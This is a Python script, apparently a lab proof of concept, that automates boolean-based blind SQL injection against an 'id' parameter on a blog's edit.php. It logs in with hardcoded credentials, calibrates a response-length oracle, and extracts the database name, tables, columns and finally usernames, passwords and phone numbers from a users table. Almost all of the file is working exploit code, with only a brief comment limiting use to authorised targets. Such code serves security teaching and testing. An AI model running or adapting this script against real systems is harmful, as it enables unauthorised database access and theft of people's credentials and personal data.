# -*- coding: utf-8 -*-
# @Time : 2022/6/16 17:12
# @Author : admin
# @Email : 1985264689@qq.com
# @File : blindtk.py
# @Project : 项目
# @脚本说明 :
from collections import Counter
import requests
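# Boolean-based blind SQL injection proof of concept against a local lab
# target (an injectable `id` parameter on edit.php, reached after logging in).
# NOTE(review): only run this against systems you are explicitly authorised
# to test; every probe below is an attack request.

TARGET = 'http://192.168.0.0/learn/blog'
LOGIN_URL = f'{TARGET}/login-1.php'
INJECT_URL = f'{TARGET}/edit.php'
LOGIN_DATA = {'username': 'admin', 'password': '123456', 'vcode': '0000'}

# Characters tried at every position.  Anything outside this set (uppercase,
# '-', '@', '.', ...) cannot be recovered and is reported as '?'.
CHARSET = 'abcdefghijklmnopqrstuvwxyz0123456789,_:'

# Upper bounds on the number of positions probed per recovered value.
MAX_DB_NAME_LEN = 15
MAX_TABLE_LIST_LEN = 15
MAX_COLUMN_LIST_LEN = 100
MAX_ROW_DUMP_LEN = 200

# Target-specific: the final dump assumes a `users` table with these columns.
ROW_DUMP_EXPR = 'select group_concat(concat_ws(":",username,password,phone)) from users'


def make_oracle(session, inject_url, base_id='1'):
    """Turn the injectable `id` parameter into a boolean oracle.

    Calibrates once with `1=1` and `1=0` and then classifies every later
    response by whichever calibration page length it is closer to.  This
    replaces the "longer than the most common length so far" heuristic,
    which could never fire on its first sample and assumed the TRUE page is
    the longer one.

    Args:
        session: authenticated `requests` session (cookies are reused).
        inject_url: URL whose `id` query parameter is injectable.
        base_id: record id the injected condition is appended to.

    Returns:
        oracle(condition: str) -> bool, True when `condition` holds server-side.

    Raises:
        RuntimeError: the TRUE and FALSE calibration pages have the same
            length, so response length cannot serve as a discriminator.
    """
    def page_len(condition):
        # `params` lets requests do the percent-encoding of spaces/quotes.
        resp = session.get(inject_url, params={'id': f'{base_id} and {condition}'})
        return len(resp.text)

    true_len = page_len('1=1')
    false_len = page_len('1=0')
    if true_len == false_len:
        raise RuntimeError('TRUE and FALSE responses have equal length; no length-based oracle')

    def oracle(condition):
        n = page_len(condition)
        # Nearest calibration point wins, which tolerates small length jitter
        # (e.g. a per-request token).  Pages with highly dynamic content may
        # need a different discriminator entirely.
        return abs(n - true_len) < abs(n - false_len)

    return oracle


def find_length(oracle, expression, max_len):
    """Return the length of `expression`'s string value, or None.

    Probes `length((expression))=N` for N in 0..max_len; None means the value
    is longer than `max_len` (or the oracle never answered True).
    """
    for length in range(0, max_len + 1):
        if oracle(f'length(({expression}))={length}'):
            return length
    return None


def extract_string(oracle, expression, max_len, charset=CHARSET):
    """Recover the string value of a SQL expression one character at a time.

    Args:
        oracle: callable(condition) -> bool from `make_oracle`.
        expression: SQL expression yielding a string (e.g. `database()` or a
            scalar subselect).  It is interpolated into the probe unescaped,
            so a `"` or `)` inside it would break the probe.
        max_len: maximum number of positions to probe.
        charset: candidate characters tried at each position.

    Returns:
        The recovered string.  A position whose character is not in `charset`
        is reported as '?'.  When the length could not be determined, all
        `max_len` positions are probed.
    """
    length = find_length(oracle, expression, max_len)
    if length == 0:
        return ''
    # MySQL substr() is 1-indexed: position 0 always yields '' and would
    # waste a full charset sweep, so start at 1.
    positions = range(1, (max_len if length is None else length) + 1)
    chars = []
    for pos in positions:
        for ch in charset:
            if oracle(f'substr(({expression}),{pos},1)="{ch}"'):
                chars.append(ch)
                break
        else:
            chars.append('?')
    return ''.join(chars)


def main():
    """Log in, then dump database name, tables, columns and the users rows."""
    session = requests.Session()
    # Authenticate once; the session cookie is reused by every probe.
    session.post(LOGIN_URL, data=LOGIN_DATA)
    oracle = make_oracle(session, INJECT_URL)

    db_name = extract_string(oracle, 'database()', MAX_DB_NAME_LEN)
    print(db_name)

    # Identifiers recovered above are interpolated unescaped; a '?' gap or a
    # quote in a name will make the dependent probes miss.
    tables_expr = ('select group_concat(table_name) from information_schema.tables '
                   f'where table_schema="{db_name}"')
    table_list = extract_string(oracle, tables_expr, MAX_TABLE_LIST_LEN)
    print(table_list)

    for table_name in table_list.strip().split(','):
        columns_expr = ('select group_concat(column_name) from information_schema.columns '
                        f'where table_schema="{db_name}" and table_name="{table_name}"')
        print(extract_string(oracle, columns_expr, MAX_COLUMN_LIST_LEN))

    print(extract_string(oracle, ROW_DUMP_EXPR, MAX_ROW_DUMP_LEN))


if __name__ == '__main__':
    main()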